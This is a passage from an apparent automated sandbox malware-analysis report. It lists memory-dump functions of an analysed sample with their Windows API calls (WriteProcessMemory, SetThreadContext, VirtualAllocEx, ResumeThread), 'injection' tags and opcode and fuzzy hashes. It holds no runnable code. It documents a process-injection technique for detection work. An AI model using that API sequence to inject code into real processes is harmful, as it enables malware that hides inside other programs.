                                                                            • Instruction Fuzzy Hash: 8621F171D013089FCB10EFA9D844ADFFFF9AF45310F04841AE518A7211DB39A904DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7201, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF7298
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 3ac28e331a8ca126a7f2f3ce8dc2ccfcb5998fe0b486de5eaef0c594616d6243
                                                                            • Instruction ID: af6db62c37d6b27e1a4e39ccbd88b14e27ec770d160f4607cc37d45263214954
                                                                            • Opcode Fuzzy Hash: 3ac28e331a8ca126a7f2f3ce8dc2ccfcb5998fe0b486de5eaef0c594616d6243
                                                                            • Instruction Fuzzy Hash: 28212471D002099FCB50DFA9C884BEEBBF5FF88314F14842AE918A7250D7789955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7208, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF7298
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 9a77045fc3b346cef00061b09a496d6e73c0eb943aa60f853809600421b536c3
                                                                            • Instruction ID: a0b1a4f4540282b3631bf91339214e03bf39a4b0e187382377a0497799c52b22
                                                                            • Opcode Fuzzy Hash: 9a77045fc3b346cef00061b09a496d6e73c0eb943aa60f853809600421b536c3
                                                                            • Instruction Fuzzy Hash: 412102719003099FCB50DFAAC884BDEBBF5FF48214F14882AE918A7250D778A955DBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF6FA8, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 06FF702E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: 4e3a0bf8c1dae208587f0435e37e204281681f8a8b0ae971fa1dc82b6aa49740
                                                                            • Instruction ID: ef1eae14ab5108ef1a37414b048246a61bcb52b83e33d1d617fc037da1eb7ef2
                                                                            • Opcode Fuzzy Hash: 4e3a0bf8c1dae208587f0435e37e204281681f8a8b0ae971fa1dc82b6aa49740
                                                                            • Instruction Fuzzy Hash: 48213771D002098FCB50DFAAC4847EFFBF5AF48224F54842AE559A7640DB78A985CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7A78, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06FF7B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumProcesses
                                                                            • String ID:
                                                                            • API String ID: 84517404-0
                                                                            • Opcode ID: 96abbcfee895a73a999252936fb8f7830a0a0d725a36fc632d4c93046838318e
                                                                            • Instruction ID: bef6900e0526a7fd44ce280b24d6318fe68f2fb0ea3ea62d82c0bcc35c82ac40
                                                                            • Opcode Fuzzy Hash: 96abbcfee895a73a999252936fb8f7830a0a0d725a36fc632d4c93046838318e
                                                                            • Instruction Fuzzy Hash: 5A2125B1D11619AFCB00CF9AD884BDEFBF4FF48224F00812AE518A3350D778A954CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5B908, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5B997
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: b623371746abeffc01fdeb453c14219e5094af003f5b31644171180628c25330
                                                                            • Instruction ID: 6bbacb2f35d39d225ca715b2e3aef8d370411fe380dc1f0fc812a9064e9c8a33
                                                                            • Opcode Fuzzy Hash: b623371746abeffc01fdeb453c14219e5094af003f5b31644171180628c25330
                                                                            • Instruction Fuzzy Hash: AB21E0B5901249DFDB10CFAAD584ADEBBF4FB48324F14841AE954A7310D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF6FB0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 06FF702E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: 2366317f93f0d9e0f37f67d11da6c085fe83025ee54b12af1c668c6399474091
                                                                            • Instruction ID: ac83b0fa320189747b667c54b60c4774a1130eed4d5e31195dc9ca8cfced0922
                                                                            • Opcode Fuzzy Hash: 2366317f93f0d9e0f37f67d11da6c085fe83025ee54b12af1c668c6399474091
                                                                            • Instruction Fuzzy Hash: C2213571D003098FCB50DFAAC4847EEFBF5AF88224F14842AD919A7340DB78A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5B910, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5B997
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 52cd4b8034a1807dbb6b92a410e840ce94e9dab571af300bf3959865c37c45c4
                                                                            • Instruction ID: 5910aeb1718cb459b3f40da34a56a0b0e0dd07c9a0f0d1d98ba532cbb929e41b
                                                                            • Opcode Fuzzy Hash: 52cd4b8034a1807dbb6b92a410e840ce94e9dab571af300bf3959865c37c45c4
                                                                            • Instruction Fuzzy Hash: 1E21C2B59012099FDB10CFAAD984ADEFBF8EB48324F14841AE954A7310D378A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF85B0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00000000,?), ref: 06FF8630
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID:
                                                                            • API String ID: 3555792229-0
                                                                            • Opcode ID: 8393e0ccd5f35371796797e23d01508482a18b3681012c5fd3cda32653ea3214
                                                                            • Instruction ID: a74308ec72d6323e6d01c9bb01a138f7334cacad70468785a86921f3e63766f0
                                                                            • Opcode Fuzzy Hash: 8393e0ccd5f35371796797e23d01508482a18b3681012c5fd3cda32653ea3214
                                                                            • Instruction Fuzzy Hash: AD213771D102098FDB14CFAAC844BEEFBF5AF88324F14842AE454A3750DB78A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7A80, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06FF7B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumProcesses
                                                                            • String ID:
                                                                            • API String ID: 84517404-0
                                                                            • Opcode ID: 724867b46bfef137c908a746e71d06747dfb019b7b76cef4e1284c8117c4e8fe
                                                                            • Instruction ID: 1cb34d29da7b05bf9abae61c0b94096705937b4924082b0149b8be776c49c0d7
                                                                            • Opcode Fuzzy Hash: 724867b46bfef137c908a746e71d06747dfb019b7b76cef4e1284c8117c4e8fe
                                                                            • Instruction Fuzzy Hash: C921F3B1D116199FCB00CF9AD884BDEFBF4FF48224F00812AE918A7340D778A954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF85B8, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00000000,?), ref: 06FF8630
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID:
                                                                            • API String ID: 3555792229-0
                                                                            • Opcode ID: 0f06539329de26e23a9303a00d8682a3a1319c28f9bfcf862c80c77dc0d73a19
                                                                            • Instruction ID: ac0880827427d1d3a1b2f14b2cb60c8183c1b6b3a858f05d36d913587a20f74b
                                                                            • Opcode Fuzzy Hash: 0f06539329de26e23a9303a00d8682a3a1319c28f9bfcf862c80c77dc0d73a19
                                                                            • Instruction Fuzzy Hash: 45212971D102098FDB50CF9AC844BEEFBF5AF88354F14842AE514A3350DB78A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7F59, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06FF7FD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumModulesProcess
                                                                            • String ID:
                                                                            • API String ID: 1082081703-0
                                                                            • Opcode ID: 3d622a315e7f1f542f24d8dc06afaf88e718dffc98c0719d3a08766df0cbbbea
                                                                            • Instruction ID: 3ae980cb0e4d0e81f533f6031df3bcdf9c32bb1fe92cef99849d3954fcbb38c3
                                                                            • Opcode Fuzzy Hash: 3d622a315e7f1f542f24d8dc06afaf88e718dffc98c0719d3a08766df0cbbbea
                                                                            • Instruction Fuzzy Hash: FF212475D002099FCB10DF9AD484BDEFBF4EF88320F148429E958A7240D778AA45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7110, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF7186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 53d3eaa357fbe37e5e26e546d38438bf13fbeda35d0ab512a49f108b3cf94076
                                                                            • Instruction ID: 4a447bcce645e40ccb22ecbd4e5fb76ba9c9c77dab01345206542996361df485
                                                                            • Opcode Fuzzy Hash: 53d3eaa357fbe37e5e26e546d38438bf13fbeda35d0ab512a49f108b3cf94076
                                                                            • Instruction Fuzzy Hash: 8C1189719003089FCB10DFAAD844BDFFBF9AF88324F148819E529A7210CB35A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7F60, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06FF7FD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumModulesProcess
                                                                            • String ID:
                                                                            • API String ID: 1082081703-0
                                                                            • Opcode ID: 616ca386da737e2cb822715a2a51f7ca0b8487c3dc62989cf00d6bc3aa0a932c
                                                                            • Instruction ID: d6a793b90203b8f5157e0839758bf4167601fa365663858599d15d7dca3cb737
                                                                            • Opcode Fuzzy Hash: 616ca386da737e2cb822715a2a51f7ca0b8487c3dc62989cf00d6bc3aa0a932c
                                                                            • Instruction Fuzzy Hash: BA2103B5D042099FCB50DF9AC484BDEFBF4EF88320F148429E968A7250D778A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07B27E98, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B27F0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 373686b12c6bbbdd7564f8a21eab483dc46ff5ca57b7e62b2add00f819e0374b
                                                                            • Instruction ID: 0fb6b10e886470aab0f21c6c97ce9cac5f5a13c759782f08d8875ba6a060164a
                                                                            • Opcode Fuzzy Hash: 373686b12c6bbbdd7564f8a21eab483dc46ff5ca57b7e62b2add00f819e0374b
                                                                            • Instruction Fuzzy Hash: 991108B1D042499FDB10DFAAC4446DFFBF5EF48324F148429D529A7200DB74A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E58950, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E596B1,00000800,00000000,00000000), ref: 00E598C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 5a9834f7c9e078b58e4d88b2cd2cb1fec531cf8ea0418e71cd0d469b385ad7d8
                                                                            • Instruction ID: b63628b9bd7d682c809dfd50c5c753ac64f6401a8f90d6495d51b672c6d1d12a
                                                                            • Opcode Fuzzy Hash: 5a9834f7c9e078b58e4d88b2cd2cb1fec531cf8ea0418e71cd0d469b385ad7d8
                                                                            • Instruction Fuzzy Hash: CF11F2B6D00349DBCB14CF9AC448ADEFBF4EB89325F14842AD915A7600C778A949CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E59852, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E596B1,00000800,00000000,00000000), ref: 00E598C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 3f5891c768acc027ce54fd703c4905567f9fc2445d458ce85877fef6d5fa64f4
                                                                            • Instruction ID: 124276a0266d206be21ed27ff163b57dbc306c8c603e431bcc56e404f5096d89
                                                                            • Opcode Fuzzy Hash: 3f5891c768acc027ce54fd703c4905567f9fc2445d458ce85877fef6d5fa64f4
                                                                            • Instruction Fuzzy Hash: 471114B6D002498FCB14CFAAC444AEEFBF4AB89324F14842AD855B7201C775A949CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7118, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF7186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 885574cdfafc8551b9664c297670e830bb1a77e86d4f1c83fb921b7dd1f40316
                                                                            • Instruction ID: dd4fd58b2b026acc709c4be82502e85880f257b31cf93c02843e39d088379641
                                                                            • Opcode Fuzzy Hash: 885574cdfafc8551b9664c297670e830bb1a77e86d4f1c83fb921b7dd1f40316
                                                                            • Instruction Fuzzy Hash: 39113471D002099FCB10DFAAC844BDFFBF5AF88324F148819E929A7250CB75A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07B28068, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 65e828f27263f16b04c14d33723026b52f384a2ecacf2ccd91aa02bb12c15fac
                                                                            • Instruction ID: 9238489245f44baac745f78825bed7bf1030488f0f0b1a1fdd779de3637518a8
                                                                            • Opcode Fuzzy Hash: 65e828f27263f16b04c14d33723026b52f384a2ecacf2ccd91aa02bb12c15fac
                                                                            • Instruction Fuzzy Hash: 681128B19002098BDB10DFAAC4447DFFBF5AB88224F148819D529A7240DB75A945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E595D0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E59636
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 35308d8b84eef9b0a8782234737fe0f834c750e14cd20fb04e0533751cd53573
                                                                            • Instruction ID: 3fb75df0e9a977d8026c5a18790b1d8550354d9a8b44991089ce9f144383d077
                                                                            • Opcode Fuzzy Hash: 35308d8b84eef9b0a8782234737fe0f834c750e14cd20fb04e0533751cd53573
                                                                            • Instruction Fuzzy Hash: AC11DFB5D016498FCB10CF9AC444ADEFBF4AB88324F14841AD829B7601D3B8A54ACFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED4C4, Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305100354.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c92caeadf5b0a439def3b13c47e1cdcc87da5c5390be942a150280ccd81ab2b4
                                                                            • Instruction ID: 8a814a686a7b1e66cad3c948cb4ce27a19c762146c9b6aa989503ea8be741b76
                                                                            • Opcode Fuzzy Hash: c92caeadf5b0a439def3b13c47e1cdcc87da5c5390be942a150280ccd81ab2b4
                                                                            • Instruction Fuzzy Hash: 122134B2504280DFCB05DF15D9C0B2BBF65FB98328F24C569E8060B246C33AD956DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E0D01C, Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7362786cfeb01e4b2af59b21dad90a030069629df9861c7e4bcf28b5a50e956d
                                                                            • Instruction ID: 77e121629d5c0cdf5fac82ed59e38903df22651b29f3082dc3b6fef1ef3e102d
                                                                            • Opcode Fuzzy Hash: 7362786cfeb01e4b2af59b21dad90a030069629df9861c7e4bcf28b5a50e956d
                                                                            • Instruction Fuzzy Hash: D8212571508200DFCB14CF54DCC4B16BB66FB84328F20C969D80D5B286C33AD887CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E0D2E4, Relevance: .1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a57db8b096ec8345850863829f1609bea471d5b3064fe59a7ef33289a51a5899
                                                                            • Instruction ID: 5d78b6f0938d0dd3a0f65ffd00996fff2f9b90c44c472250c8b62c058ba85325
                                                                            • Opcode Fuzzy Hash: a57db8b096ec8345850863829f1609bea471d5b3064fe59a7ef33289a51a5899
                                                                            • Instruction Fuzzy Hash: AC2108B1508340DFD710DF54D9C4B6ABBA5FB94728F24C569D4096B285C33DD886C763
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E0D005, Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 456009cc70496f4495a8881dadb0141211851137ae4796dd9d119fda4332cc7f
                                                                            • Instruction ID: 49015d597f7934fad581f7d71ccabc20b6a19c2f9b0a2529a4532199a3b95af6
                                                                            • Opcode Fuzzy Hash: 456009cc70496f4495a8881dadb0141211851137ae4796dd9d119fda4332cc7f
                                                                            • Instruction Fuzzy Hash: CB21507550D3C08FCB12CF64D994715BF71EB46314F28C5EAD8498B697C33A984ACB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED4BF, Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305100354.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                            • Instruction ID: c0c5a0ab117dee455d4c6c739bf3b759c2c5b5b91ffda64a2effc37a7cd40bad
                                                                            • Opcode Fuzzy Hash: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                            • Instruction Fuzzy Hash: 3E11E6B6404280CFCF12CF10D9C4B16BF71FB94324F24C6AAD8450B656C33AD95ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07334273, Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7314df80411e7fb59e8fc2a638bf9369ce981a9fe85117d08fbfcf39c5594955
                                                                            • Instruction ID: 74579c3592e92b3834a48017be2e49a9268db10d92db5443c94e4679747b64b6
                                                                            • Opcode Fuzzy Hash: 7314df80411e7fb59e8fc2a638bf9369ce981a9fe85117d08fbfcf39c5594955
                                                                            • Instruction Fuzzy Hash: DB21D6B4A00218CFDB54DF68D485AAAF7F5EB89214F10C0E6E919A7356CB34ED41CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E0D2DF, Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
                                                                            • Instruction ID: 04b492e524bd4069a633b46035ea43588eafb406ce0d92886438c5568929907b
                                                                            • Opcode Fuzzy Hash: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
                                                                            • Instruction Fuzzy Hash: 1D11E371508680CFCB11CF14D9C4719FBA1FB84724F24C6AAC8485B686C339D84ACB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733548C, Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c33ee326c16a7bf59bf28a919398ffa1ecc295a9ccf985a86ba90bcc5750186
                                                                            • Instruction ID: 293060d483996121333b22178e385fcb76330aedca76d3874f72164820e06b5c
                                                                            • Opcode Fuzzy Hash: 6c33ee326c16a7bf59bf28a919398ffa1ecc295a9ccf985a86ba90bcc5750186
                                                                            • Instruction Fuzzy Hash: CF1116B4B44258CFDB20DF68D985A99BBB1EF49311F4081D6E50DEB751C734AE808F52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733E5F0, Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a02557c17381098f879364ac97db47429312749029eb09267702522282371df7
                                                                            • Instruction ID: 9d23f210b36b44ab7cecdca9866a753bfbb23cbe0eaf157789bf78ca8347e0e3
                                                                            • Opcode Fuzzy Hash: a02557c17381098f879364ac97db47429312749029eb09267702522282371df7
                                                                            • Instruction Fuzzy Hash: 86D012633105A5378548619EAC0196FF29DCBC7AA2B41013AF718D77C1CD51AC1503E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733F260, Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4dcbe4033a72af47d9ed311cb747278391011be0246df7b38907bdade559173c
                                                                            • Instruction ID: 67661f11289e488b196c43d9e4b9035e084ce03d1e7f6fb4b400ab9f3324e5fc
                                                                            • Opcode Fuzzy Hash: 4dcbe4033a72af47d9ed311cb747278391011be0246df7b38907bdade559173c
                                                                            • Instruction Fuzzy Hash: 62D0A9F2D0220CFB9B00EFF0C8018AFB7B8DB01100B0245EA9909AB210FE328F0067C2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733C850, Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bf87a8783de032847ca39a236a3e25b0fab7c9aecc566bcafa58cdfaf4bd300
                                                                            • Instruction ID: c8dc973f9470577cd291bc76b630d184bbe0273953f16ee3b51c8d032b4f6afb
                                                                            • Opcode Fuzzy Hash: 4bf87a8783de032847ca39a236a3e25b0fab7c9aecc566bcafa58cdfaf4bd300
                                                                            • Instruction Fuzzy Hash: 79D052B2D0220CEB9B00EFA0880188EB6B8DB01100B0045EA99089B220EA328E006BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733EE88, Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
